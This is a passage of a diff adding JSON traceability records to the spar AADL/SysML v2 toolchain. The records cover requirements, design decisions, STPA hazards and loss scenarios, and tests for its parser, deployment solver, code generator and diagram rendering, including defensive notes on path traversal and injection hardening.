+      "type": "requirement"
+    },
+    {
+      "description": "New spar-codegen crate generates both WIT interfaces and Rust crate skeletons from AADL instance model. Process → crate + WIT world, thread → async fn, data port → typed channel / WIT stream. System generates Cargo workspace + WAC composition.\n",
+      "id": "ARCH-CODEGEN-001",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-CODEGEN-WIT",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-CODEGEN-RUST",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-SEC-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "codegen",
+        "v040"
+      ],
+      "title": "spar-codegen crate with dual output (WIT + native Rust)",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that computed values and type references skip validation (cannot be checked statically).\n",
+      "id": "VAL-015",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "ComputedValue and TypeRef skip validation",
+      "type": "feature"
+    },
+    {
+      "description": "\nTwo processes share a memory region (e.g.,\na shared data component).\n\nLayer 1's resource accounting counts the shared memory size for\n\nboth processes,\nconsuming 2x the actual memory. The allocator\n\nrejects a feasible allocation because the memory budget appears\n\nexhausted. Alternatively,\nif the allocator only counts once but\n\nassigns the processes to different processors,\nthe shared memory\n\nis allocated on both processors (duplicated),\nexceeding the real\n\nmemory budget.\n",
+      "id": "LS-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Allocator double-counts shared memory",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Data port, event port, event data port, parameter, data access, bus access, subprogram access, subprogram_group access, feature group, abstract feature. With direction (in/out/in_out) and array dimensions.\n",
+      "id": "REQ-MODEL-003",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "model",
+        "as5506-ch8"
+      ],
+      "title": "Support all feature kinds",
+      "type": "requirement"
+    },
+    {
+      "description": "Added 48 parser tests: 7 error-handling tests (STPA-REQ-001) verifying ERROR nodes are produced for invalid syntax while CST remains lossless, and 41 production coverage tests (STPA-REQ-003) covering previously untested grammar productions (extends, prototypes, call sequences, access connections, property expressions, annexes, renames, etc.).\n",
+      "id": "ARCH-019",
+      "links": [
+        {
+          "target": "STPA-REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser error handling and production coverage tests",
+      "type": "design-decision"
+    },
+    {
+      "description": "compute_semantic_connections() now emits diagnostics for connections with missing endpoints (src/dst None) and unresolved subcomponent references in connection endpoints.\n",
+      "id": "ARCH-021",
+      "links": [
+        {
+          "target": "STPA-REQ-013",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Unresolved connection endpoint diagnostics",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nA SysML v2 constraint usage `constraint timing\n:\nTimingConstraint`\n\nwith `attribute period = 10 ms` is lowered via\n\nlower_constraint_usage_to_property which produces a PropertyExpr::Opaque\n\nstring \"TimingConstraint\" instead of a typed IntegerLit with unit.\n\nThe AADL model has a Timing_Properties::timing property with an\n\nopaque value. Scheduling analysis calls get_timing_property() which\n\ncannot parse the opaque string and returns None. The thread's period\n\nis treated as unspecified. No scheduling check is performed.\n",
+      "id": "LS-11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 timing constraint lowered as Opaque property",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "\nIn a large model the engineer cannot locate the component or\n\nsubsystem they need,\nwasting significant time or missing a\n\nreview deadline.\n",
+      "id": "L-R2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Engineer cannot find relevant component",
+      "type": "loss"
+    },
+    {
+      "description": "\nThe parser encounters an annex subclause (e.g.,\nEMV2 error model\n\nwithin a component) but the annex parsing code returns None instead\n\nof an error. The CST has no node for the annex. The model builder\n\nnever sees the error model. EMV2 fault tree analysis finds no\n\nannotations and reports \"no error model\" (info). The actual error\n\npropagation paths are never checked.\n",
+      "id": "LS-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Annex subclause silently dropped",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "UCA-S15",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewriter produces invalid AADL syntax",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe AADL model is missing properties that the solver needs\n\n(e.g.,\nno Compute_Execution_Time on a thread,\nno Memory_Size\n\non a process,\nno Bandwidth on a bus) and the solver silently\n\nassumes default values or skips the constraint,\nproducing a\n\nbinding that looks feasible but is incomplete.\n",
+      "id": "H-S11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Incomplete model input causes unsound solution",
+      "type": "hazard"
+    },
+    {
+      "description": "Export analysis diagnostics and diff results in SARIF format for integration with GitHub Code Scanning, enabling architectural findings as code review annotations.\n",
+      "id": "REQ-DIFF-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "diff",
+        "sarif",
+        "integration",
+        "v030"
+      ],
+      "title": "SARIF output for GitHub Code Scanning integration",
+      "type": "requirement"
+    },
+    {
+      "description": "Thirty-five tests covering AADL grammar productions including feature groups, annex subclauses, property expressions, prototypes, renames, call sequences, virtual types, refinements, and more. Each test parses a dedicated .aadl fixture file and verifies the CST structure.\n",
+      "id": "TEST-STPA-PARSER-COVERAGE",
+      "links": [
+        {
+          "target": "STPA-REQ-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser production coverage tests (STPA-REQ-003)",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe parser must produce CST nodes for all valid AADL v2.2 constructs.\n\nUnrecognized constructs must produce error diagnostics,\nnever silent\n\nomission.\n",
+      "id": "SC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser completeness",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Generated workspace includes both Cargo.toml (development iteration) and BUILD.bazel (hermetic CI + verification). Bazel runs wit-bindgen as build action (plain .rs output, no proc macro), rules_verus, rules_lean, rules_wasm_component. Cargo uses proc macros for build-time checks and standard cargo test for test-time checks.\n",
+      "id": "ARCH-CODEGEN-003",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-BAZEL",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "codegen",
+        "bazel",
+        "v040"
+      ],
+      "title": "Dual build system (Cargo dev + Bazel CI)",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nNo zoom,\npan,\nsearch,\nor filtering capability exists,\nso\n\nengineers viewing models with dozens or hundreds of components\n\ncannot find or focus on the subsystem they need.\n",
+      "id": "H-R3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Cannot navigate large models",
+      "type": "hazard"
+    },
+    {
+      "description": "\nA thread component type has no Compute_Execution_Time property\n\n(the engineer forgot to add it). The solver's Layer 0 reads the\n\nproperty,\ngets None,\nand defaults to 0 ps. The thread consumes\n\nzero CPU in the utilization calculation. Layer 1 packs 20 threads\n\nonto a processor that can actually handle 15. At runtime,\nthe\n\nactual execution time causes processor overload and deadline\n\nmisses across all threads.\n",
+      "id": "LS-S13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Missing Compute_Execution_Time silently assumed zero",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "CA-OPTIMIZE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Global optimization (Layer 3)",
+      "type": "control-action"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Codegen embeds property value in Rust constant without bounds",
+      "type": "uca"
+    },
+    {
+      "description": "VS Code extension combines native spar binary for LSP editing intelligence (10 IDE features) with jco-transpiled spar-wasm for in-process diagram rendering. WASI filesystem calls are shimmed to read workspace files. Webview panel shows interactive HTML from etch with ports, orthogonal routing, and pan/zoom.\n",
+      "id": "ARCH-R5",
+      "links": [
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "RENDER-REQ-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "tooling",
+        "vscode"
+      ],
+      "title": "VS Code extension with native LSP and WASM rendering",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-S18",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate claims infeasible when solution exists",
+      "type": "uca"
+    },
+    {
+      "description": "Allow editing the architecture via the diagram (add components, draw connections, change properties) with changes propagated back to AADL source via rowan CST. Currently spar renders read-only diagrams. OSATE graphical editor and Ellidiss STOOD both support bidirectional editing.\n",
+      "id": "REQ-BIDIRECTIONAL-001",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "rendering",
+        "editing",
+        "competitive-gap",
+        "v050"
+      ],
+      "title": "Bidirectional diagram editing",
+      "type": "requirement"
+    },
+    {
+      "description": "After SysML v2 lowering, the inferred AADL component category must be validated against the features present in the lowered component. If a component has thread-like properties (Period, Dispatch_Protocol) it must not be classified as system. A test suite must cover all category inference paths with at least one test per SysML v2 construct type (part def, action def, state def, etc.).\n",
+      "id": "STPA-REQ-033",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "sysml2",
+        "category",
+        "stpa"
+      ],
+      "title": "SysML v2 category inference validation",
+      "type": "requirement"
+    },
+    {
+      "description": "The response-time analysis must include blocking time from shared resources (Priority_Ceiling_Protocol or highest-locker analysis), interrupt overhead, and context-switch time. When these properties are not specified in the model, the RTA must emit a warning that overhead is not accounted for and that the schedulability result is optimistic.\n",
+      "id": "SOLVER-REQ-003",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "scheduling",
+        "overhead",
+        "stpa"
+      ],
+      "title": "RTA must include blocking and overhead terms",
+      "type": "requirement"
+    },
+    {
+      "description": "22 correctness and security fixes from adversarial scanning: XSS prevention via HTML entity escaping in SVG output, YAML/TOML injection prevention via safe serialization, path traversal guards on file operations, UTF-8 safe percent decoding, arena index bounds checks preventing panics on invalid input.\n",
+      "id": "ARCH-SECURITY-HARDEN",
+      "links": [
+        {
+          "target": "STPA-SEC-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "security"
+      ],
+      "title": "Security hardening across rendering and CLI",
+      "type": "design-decision"
+    },
+    {
+      "description": "The solver must produce identical results given identical inputs. All internal data structures must use deterministic iteration order (BTreeMap, IndexMap, or sorted Vec — not HashMap/HashSet). Tie-breaking for equal-cost solutions must use a deterministic criterion (lexicographic ordering of component names). A CI test must run the solver 10 times on the same input and verify identical output.\n",
+      "id": "SOLVER-REQ-030",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "determinism",
+        "stpa"
+      ],
+      "title": "Deterministic solver output",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lowering assigns wrong property value",
+      "type": "uca"
+    },
+    {
+      "description": "WIT-to-AADL and AADL-to-WIT round-trip tests.",
+      "id": "TEST-TRANSFORM",
+      "links": [
+        {
+          "target": "ARCH-TRANSFORM",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-TRANSFORM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Transform unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nAfter all solver layers complete,\na global validation pass must\n\ncheck all cross-layer constraints (E2E latency,\ntotal resource\n\nbudgets,\nsafety decomposition completeness).\n",
+      "id": "SC-S9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Global constraints must be verified after hierarchical composition",
+      "type": "system-constraint"
+    },
+    {
+      "description": "When the binding configuration requires changes to multiple AADL files, all changes must be applied atomically. The rewriter must identify all files needing modification before writing any file. If any file cannot be written (permissions, disk error), no files must be modified. The rewriter should write to temporary files first, then rename all atomically.\n",
+      "id": "SOLVER-REQ-020",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "rewriter",
+        "atomicity",
+        "stpa"
+      ],
+      "title": "Atomic multi-file rewrite",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe mathematical proof artifact that the solution is optimal or\n\nwithin a bounded gap of optimality.\n",
+      "id": "CP-CERTIFICATE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Optimality Certificate",
+      "type": "controlled-process"
+    },
+    {
+      "description": "",
+      "id": "CC-S7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "All cross-processor connections must be identified",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Tests verifying the interactive HTML output supports zoom, pan, minimap, search, and selection/highlighting of components and connections.\n",
+      "id": "VAL-R4",
+      "links": [
+        {
+          "target": "RENDER-REQ-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "RENDER-REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-R3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "HTML interactive feature tests (RENDER-REQ-003, RENDER-REQ-005)",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CTRL-LAYER3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layer 3 — Global Optimizer (E2E, safety decomposition)",
+      "type": "controller"
+    },
+    {
+      "description": "Verifies boolean expressions match AadlBoolean and mismatch AadlString with appropriate diagnostics.\n",
+      "id": "VAL-010",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Boolean type matching and mismatching",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis uses wrong property value",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CA-SYSML2-LOWER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lower SysML v2 to AADL",
+      "type": "control-action"
+    },
+    {
+      "description": "\nAfter source rewriting,\nthe modified AADL files must parse without\n\nnew syntax errors. All pre-existing properties and constructs must\n\nbe preserved. The rewrite must be invertible (diff-reviewable).\n",
+      "id": "SC-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source rewrites must preserve model validity",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-18",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification rules must fail on missing tools",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe codegen CLI writes generated files to --output directory\n\nusing paths constructed from model element names. A crafted\n\ncomponent name containing path traversal sequences (../),\n\nafter sanitize_ident processing,\ncould write files outside\n\nthe intended output directory.\n",
+      "id": "H-SEC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Codegen writes to arbitrary filesystem paths",
+      "type": "hazard"
+    },
+    {
+      "description": "\nThe workspace_gen.rs generates per-crate BUILD.bazel files with\n\nrust_library,\nwasm_component,\nand rust_test targets. However,\nit does\n\nnot generate verus_verify or lean_verify targets because the code\n\ngenerator does not know which files contain proof annotations. The\n\nworkspace root BUILD.bazel loads the verification rules but no\n\nper-crate target uses them. Running `bazel test //...` executes\n\nall rust_test targets but no formal verification. Engineers believe\n\nthe full pipeline ran because the workspace imports verification rules.\n",
+      "id": "LS-13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated crate has no verification targets",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Added 24 round-trip tests to spar-hir covering every Serialize+ Deserialize type: Package, ComponentType, ComponentImpl, Feature, Subcomponent, Connection, FlowSpec, EndToEndFlow, Mode, ModeTransition, PropertyAssociation, Classifier (all variants), InstanceNode (with nested tree), InstanceFeature, InstanceConnection, plus all enum types (ComponentCategory, Direction, FeatureKind, ConnectionKind, FlowKind, AccessKind).\n",
+      "id": "ARCH-018",
+      "links": [
+        {
+          "target": "STPA-REQ-019",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Serde round-trip tests for all public types",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-S18",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Missing properties must be errors, not defaults",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nA SysML v2 part def represents a software process containing threads.\n\nThe infer_category heuristic checks for action/state usages in the\n\nbody but the threads are expressed as nested part usages (not actions).\n\nThe part is classified as ComponentCategory::System. The AADL model\n\nhas a system implementation with system subcomponents where it should\n\nhave a process implementation with thread subcomponents. Scheduling\n\nanalysis finds no threads on any processor and reports no issues.\n\nThe actual thread set is never checked for schedulability.\n",
+      "id": "LS-10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Part def misclassified as system instead of process",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Tests verifying that the same AADL model always produces the same layout output. Covers node positions, edge routes, and port placement across repeated runs.\n",
+      "id": "VAL-R1",
+      "links": [
+        {
+          "target": "RENDER-REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-R4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Layout determinism tests (RENDER-REQ-004)",
+      "type": "feature"
+    },
+    {
+      "description": "Engineers must be able to annotate ports as intentionally unconnected (e.g., via a property SPAR_Properties::Intentionally_Unconnected). Connectivity analysis must suppress warnings for annotated ports to reduce false positives and alert fatigue.\n",
+      "id": "STPA-REQ-018",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "analysis",
+        "false-positive",
+        "stpa"
+      ],
+      "title": "Intentional no-connection annotation",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CA-REWRITE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Rewrite AADL source with binding properties",
+      "type": "control-action"
+    },
+    {
+      "description": "Verifies that a port annotated with SPAR_Properties:: Intentionally_Unconnected does not produce a connectivity warning. Tests cover single feature, \"all\" variant, parenthesized list, and case-insensitive matching.\n",
+      "id": "VAL-029",
+      "links": [
+        {
+          "target": "STPA-REQ-018",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Intentionally unconnected port suppresses warning",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "RTA uses wrong execution time value",
+      "type": "uca"
+    },
+    {
+      "description": "Compare two revisions of an AADL model structurally (added/removed/ changed components, connections, properties) and diff their analysis results to show impact of changes on scheduling, latency, etc.\n",
+      "id": "REQ-DIFF-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "diff",
+        "git",
+        "v030"
+      ],
+      "title": "Git-aware structural diff with analysis impact comparison",
+      "type": "requirement"
+    },
+    {
+      "description": "Each AADL process generates a WIT world with interfaces for its features. Data ports → WIT stream<T>, event ports → WIT future, subprogram access → WIT functions. wit-bindgen runs as Bazel build action (not proc macro) producing plain Rust bindings.\n",
+      "id": "REQ-CODEGEN-WIT",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "wit",
+        "v040"
+      ],
+      "title": "Generate WIT interfaces from AADL processes",
+      "type": "requirement"
+    },
+    {
+      "description": "Structural diff uses git worktrees to check out two revisions simultaneously, instantiates each through the standard spar pipeline, and compares the resulting instance models structurally. Analysis impact is computed by running the same passes on both revisions and diffing the diagnostics.\n",
+      "id": "ARCH-DIFF-001",
+      "links": [
+        {
+          "target": "REQ-DIFF-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-DIFF-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-DIFF-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "diff",
+        "v030"
+      ],
+      "title": "Git worktrees for revision comparison",
+      "type": "design-decision"
+    },
+    {
+      "description": "Generated #[aadl(period_ps=N, deadline_ps=N, ...)] attributes checked against AADL model at build time. Proc macro (Cargo) or build action (Bazel) reads model and fails compilation if constants diverge. Catches structural drift between design and code.\n",
+      "id": "REQ-CODEGEN-VERIFY-BUILD",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "verification",
+        "v040"
+      ],
+      "title": "Build-time AADL attribute verification",
+      "type": "requirement"
+    },
+    {
+      "description": "Hardware topology extracted from AADL instance model into a petgraph DiGraph. Processor nodes with capacity properties (CPU budget, memory, scheduling policy). Bus edges with bandwidth and protocol properties. Memory nodes with size properties. Used as the target graph for deployment allocation.\n",
+      "id": "ARCH-SOLVER-002",
+      "links": [
+        {
+          "target": "REQ-SOLVER-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "solver",
+        "v030"
+      ],
+      "title": "Topology graph as petgraph",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CTRL-LAYER0",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layer 0 — Thread Scheduler (RTA)",
+      "type": "controller"
+    },
+    {
+      "description": "\nThe solver optimizes for minimum total bus latency (sum of protocol\n\nlatencies across all connections). The certificate generator computes\n\nthe dual bound for a different objective (minimum processor count).\n\nThe gap calculation compares incompatible primal and dual values.\n\nThe certificate reports a 0% gap (apparently optimal) because the\n\ndual of the wrong problem happens to produce a tight bound. The\n\nactual latency solution is 30% suboptimal.\n",
+      "id": "LS-S14",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate validates wrong objective function",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Tests for the property assertion DSL covering passing assertions, failing assertions with evidence, assertions referencing analysis results, and malformed assertion syntax errors.\n",
+      "id": "VAL-VERIFY-001",
+      "links": [
+        {
+          "target": "REQ-VERIFY-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-VERIFY-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Property assertion rule tests",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CA-REVIEW",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Review and approve architecture",
+      "type": "control-action"
+    },
+    {
+      "description": "hierarchy.rs validates all 14 category containment rules per section 4.5. naming_rules.rs checks naming legality.\n",
+      "id": "COVERAGE-CH4",
+      "links": [
+        {
+          "target": "REQ-MODEL-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.4: Components — containment rules",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "All safety analyses must be registered by default",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe solver's schedulability check (RTA at Layer 0) uses incorrect\n\nparameters,\nwrong algorithm assumptions,\nor insufficient precision,\n\ncausing it to accept a task set that is actually unschedulable.\n",
+      "id": "H-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver misses timing constraint",
+      "type": "hazard"
+    },
+    {
+      "description": "instance.rs handles recursive instantiation, array expansion, semantic connection tracing, and circular containment detection.\n",
+      "id": "COVERAGE-CH14",
+      "links": [
+        {
+          "target": "REQ-INST-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.14: Instance model construction",
+      "type": "requirement"
+    },
+    {
+      "description": "Analysis passes must access property values through typed accessor functions (e.g., get_period() -> Option<Duration>) that perform unit conversion and type validation. Direct string parsing of property values in analysis code is prohibited.\n",
+      "id": "STPA-REQ-015",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "analysis",
+        "properties",
+        "stpa"
+      ],
+      "title": "Typed property accessors for analyses",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SEC-SYSML2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 Lowering Controller",
+      "type": "controller"
+    },
+    {
+      "description": "Process-to-processor allocation uses First-Fit Decreasing (FFD) and Best-Fit Decreasing (BFD) bin-packing heuristics with schedulability validation. After tentative allocation, RTA is run per processor. If schedulability fails, the process is tried on the next candidate. Pure Rust, no external dependencies, WASM-compatible.\n",
+      "id": "ARCH-SOLVER-004",
+      "links": [
+        {
+          "target": "REQ-SOLVER-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "solver",
+        "v040"
+      ],
+      "title": "Pure Rust bin-packing for Layer 1",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser silently drops construct",
+      "type": "uca"
+    },
+    {
+      "description": "Will verify that unrecognized SysML v2 SyntaxKind variants produce a warning diagnostic instead of being silently dropped. Blocked on STPA-REQ-032 implementation.\n",
+      "id": "VAL-060",
+      "links": [
+        {
+          "target": "STPA-REQ-032",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-026",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "SysML v2 unhandled construct diagnostic (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "Import cargo metadata to generate virtual AADL packages representing Rust crate architecture.\n",
+      "id": "REQ-TRANSFORM-002",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "transform",
+        "rust"
+      ],
+      "title": "Rust crate introspection",
+      "type": "requirement"
+    },
+    {
+      "description": "New spar-sysml2 crate with rowan-based parser for SysML v2 textual notation. Hand-written recursive descent, lossless CST, error recovery. Same architecture as spar-parser. Covers KerML kernel + SysML v2 profile (part, port, connection, requirement, constraint, action, state).\n",
+      "id": "REQ-SYSML2-PARSE",
+      "links": [
+        {
+          "target": "REQ-INTEROP-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "sysml2",
+        "parser",
+        "v040"
+      ],
+      "title": "Parse SysML v2 textual notation (KerML grammar)",
+      "type": "requirement"
+    },
+    {
+      "description": "collect_type_chain_features and collect_impl_chain walk the extends chain recursively with cycle detection. Features deduplicated by name.\n",
+      "id": "ARCH-EXTENDS",
+      "links": [
+        {
+          "target": "REQ-MODEL-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0"
+      ],
+      "title": "Type inheritance via extends chain walking",
+      "type": "design-decision"
+    },
+    {
+      "description": "The workspace_gen.rs code generator must produce verus_verify and/or lean_verify targets in per-crate BUILD.bazel files when generating code that includes verification annotations. An integration test must verify that generated BUILD.bazel files contain at least one verification target per generated crate.\n",
+      "id": "STPA-REQ-038",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "codegen",
+        "verification",
+        "bazel",
+        "stpa"
+      ],
+      "title": "Generated BUILD files must include verification targets",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S20",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Post-solve validation not performed",
+      "type": "uca"
+    },
+    {
+      "description": "\nworkspace_gen generates Cargo.toml with hardcoded dependency\n\nversions (wit-bindgen,\nserde,\nserde_json,\ntoml). If an attacker\n\ncan influence the process names in the model,\ncrate names in the\n\nworkspace members could collide with malicious crates on crates.io.\n\nThe generated BUILD.bazel loads rules from relative paths that\n\nassume a trusted workspace root.\n",
+      "id": "H-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated workspace pulls untrusted dependencies",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Affinity and anti-affinity constraints must be enforced",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Resolve qualified property references (PropertySet::PropertyName) across files.\n",
+      "id": "REQ-RESOLVE-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "resolution",
+        "as5506-ch11"
+      ],
+      "title": "Property reference resolution",
+      "type": "requirement"
+    },
+    {
+      "description": "Each generated crate includes a design document with rivet YAML frontmatter (id, type, links). Verification records generated as rivet verification-verdict artifacts. Link types chosen for SysML v2 forward compatibility (satisfies → satisfy, verifies → verify).\n",
+      "id": "ARCH-CODEGEN-004",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-RIVET",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "codegen",
+        "rivet",
+        "v040"
+      ],
+      "title": "rivet frontmatter in generated design docs",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
